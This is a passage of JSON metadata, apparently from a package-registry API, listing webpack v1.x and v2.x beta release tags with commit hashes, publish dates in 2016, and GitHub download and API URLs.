b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webp